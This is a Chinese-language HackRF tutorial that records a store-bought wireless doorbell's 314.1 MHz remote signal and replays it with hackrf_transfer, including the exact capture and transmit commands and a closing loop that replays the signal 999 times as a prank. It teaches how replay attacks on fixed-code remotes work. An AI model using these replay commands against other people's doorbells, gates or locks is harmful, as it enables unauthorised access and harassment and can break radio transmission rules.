標籤:
0×00 前言
在第一篇文章:永不消逝的電波(一):無線電入門篇 我們瞭解了一下無線電的發展史以及無線電的一些物理知識,在第二篇裡我們將用HackRF錄製家用門鈴的無線訊號,然後重放門鈴訊號。
門鈴從某寶買的,
0×01 環境搭建:
MAC下可以用gqrx和hackrf (需要有Xcode、Mac Port的支援)
sudo port install gnuradiosudo port install hackrfsudo port install rtl-sdrsudo port install gr-osmosdrsudo port install hackrf
sudo port install gqrx
也可以參考:在Mac上安裝HackRF環境
0×02 步入正題:
安裝完成以後,插入HackRF,終端執行 hackrf_info:
hackrf_info Found HackRF board.Board ID Number: 2 (HackRF One)Firmware Version: git-815d1f6Part ID Number: 0xa000cb3c 0x00664f49Serial Number: 0x00000000 0x00000000 0x583064c0 0x2640ad4b
#通過終端啟動gqrxgqrx
按下遙控器,我們可以看到訊號的頻率在314.100000Mhz(讀作:314.1兆赫茲)左右
1Mhz=1000000hz;1Khz=1000hz314.1Mhz=314100000hz;
關掉gqrx啟動hackrf
hackrf_transfer Usage:
Usage: -r <filename> # Receive data into file. 把接收到的訊號、資料儲存到檔案中;(訊號錄製) -t <filename> # Transmit data from file. 從檔案中提取、發送射頻訊號;(訊號播放) -w # Receive data into file with WAV header and automatic name. # This is for SDR# compatibility and may not work with other software. [-f freq_hz] # Frequency in Hz [0MHz to 7250MHz]. [-i if_freq_hz] # Intermediate Frequency (IF) in Hz [2150MHz to 2750MHz]. [-o lo_freq_hz] # Front-end Local Oscillator (LO) frequency in Hz [84MHz to 5400MHz]. [-m image_reject] # Image rejection filter selection, 0=bypass, 1=low pass, 2=high pass. [-a amp_enable] # RX/TX RF amplifier 1=Enable, 0=Disable. [-p antenna_enable] # Antenna port power, 1=Enable, 0=Disable. [-l gain_db] # RX LNA (IF) gain, 0-40dB, 8dB steps [-g gain_db] # RX VGA (baseband) gain, 0-62dB, 2dB steps [-x gain_db] # TX VGA (IF) gain, 0-47dB, 1dB steps [-s sample_rate_hz] # Sample rate in Hz (8/10/12.5/16/20MHz, default 10MHz). [-n num_samples] # Number of samples to transfer (default is unlimited). [-c amplitude] # CW signal source mode, amplitude 0-127 (DC value to DAC). [-b baseband_filter_bw_hz] # Set baseband filter bandwidth in MHz. Possible values: 1.75/2.5/3.5/5/5.5/6/7/8/9/10/12/14/15/20/24/28MHz, default < sample_rate_hz.
hackrf_transfer -r /dev/stdout -f 314100000 -a 1 -g 16 -l 32 -s 8000000
沒按遙控器
按下遙控器:
由於hackrf_transfer後面沒帶解碼參數,so我們看到一堆亂碼資料;
0×03 錄製訊號&訊號分析
錄製遙控的無線訊號:
hackrf_transfer -r door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000
終端輸出:
hackrf_transfer -r door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000call hackrf_sample_rate_set(8000000 Hz/8.000 MHz)call hackrf_baseband_filter_bandwidth_set(3500000 Hz/3.500 MHz)call hackrf_set_freq(314100000 Hz/314.100 MHz)call hackrf_set_amp_enable(1)Stop with Ctrl-C16.0 MiB / 1.005 sec = 15.9 MiB/second16.0 MiB / 1.003 sec = 15.9 MiB/second16.0 MiB / 1.004 sec = 15.9 MiB/second16.3 MiB / 1.004 sec = 16.2 MiB/second16.0 MiB / 1.002 sec = 16.0 MiB/second16.0 MiB / 1.001 sec = 16.0 MiB/second16.0 MiB / 1.004 sec = 15.9 MiB/second16.0 MiB / 1.003 sec = 15.9 MiB/second16.3 MiB / 1.003 sec = 16.2 MiB/second16.0 MiB / 1.003 sec = 15.9 MiB/second16.0 MiB / 1.005 sec = 15.9 MiB/second^CCaught signal 2 8.1 MiB / 0.510 sec = 15.9 MiB/secondUser cancel, exiting...Total time: 11.54724 shackrf_stop_rx() donehackrf_close() donehackrf_exit() donefclose(fd) doneexit
訊號波形分析:
這裡用到的軟體是Audacity,匯入錄製的音頻訊號(未壓縮未經處理資料)
然後出現如下介面:
使用預設參數,直接匯入:
中間的那部分就是按下遙控時錄製到的無線訊號,我們使用Audacity的放大鏡放大來看:
繼續放大我們可以看到:
繼續放大:
再放大:
這時經驗比較豐富的童鞋可以通過圖形,把無線射頻訊號轉換成位元據:01010101**** ,接著可以把二進位寫到GRC(Gnu Radio Cpmpainon),製作一個框圖,使用GNC項目重放無線訊號,大致方法如下:
啟動Gnu Radio Cpmpainon :Kali Linux—->無線攻擊—>Software defined Radio—>GnuRadio-Companion
源:在右側Misc一欄找到Vector Source
通過搜尋添加Repeat(old)、Moving Average、osmocom Sink
四個組件:
按照流程連線:
GNC用得不多,暫時還不上手,這種方法以後再試 :)
0×04 訊號重放
使用hackrf_transfer重放訊號:
hackrf_transfer -t door.raw -f 314100000 -x 47 -a 1 -s 8000000 -b 4000000
終端輸出:
hackrf_transfer -t door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000call hackrf_sample_rate_set(8000000 Hz/8.000 MHz)call hackrf_baseband_filter_bandwidth_set(3500000 Hz/3.500 MHz)call hackrf_set_freq(314100000 Hz/314.100 MHz)call hackrf_set_amp_enable(1)Stop with Ctrl-C16.0 MiB / 1.004 sec = 15.9 MiB/second16.0 MiB / 1.004 sec = 15.9 MiB/second16.0 MiB / 1.003 sec = 15.9 MiB/second16.0 MiB / 1.001 sec = 16.0 MiB/second16.0 MiB / 1.000 sec = 16.0 MiB/second16.3 MiB / 1.001 sec = 16.2 MiB/second16.0 MiB / 1.003 sec = 16.0 MiB/second16.0 MiB / 1.001 sec = 16.0 MiB/second16.0 MiB / 1.005 sec = 15.9 MiB/second16.0 MiB / 1.003 sec = 15.9 MiB/second16.3 MiB / 1.003 sec = 16.2 MiB/second 8.4 MiB / 1.004 sec = 8.4 MiB/second Exiting... hackrf_is_streaming() result: HACKRF_ERROR_STREAMING_EXIT_CALLED (-1004)Total time: 12.03184 shackrf_stop_tx() donehackrf_close() donehackrf_exit() donefclose(fd) doneexit
0×05 示範視頻
熊孩子的正確使用姿勢是這樣的:
for i in {1..999}; do hackrf_transfer -t door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000; done
嗯,你沒看錯,重複播放九百九十九次 :)
0×06 參考:
Hacking fixed key remotes
Exploring Bluetooth & iBeacons – from software to radio signals and back.
中文版:HackRF嗅探藍芽重放iBeacons訊號
GNU_Radio入門_V0.99
永不消逝的電波(二)HackRF入門:家用無線門鈴訊號重放
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
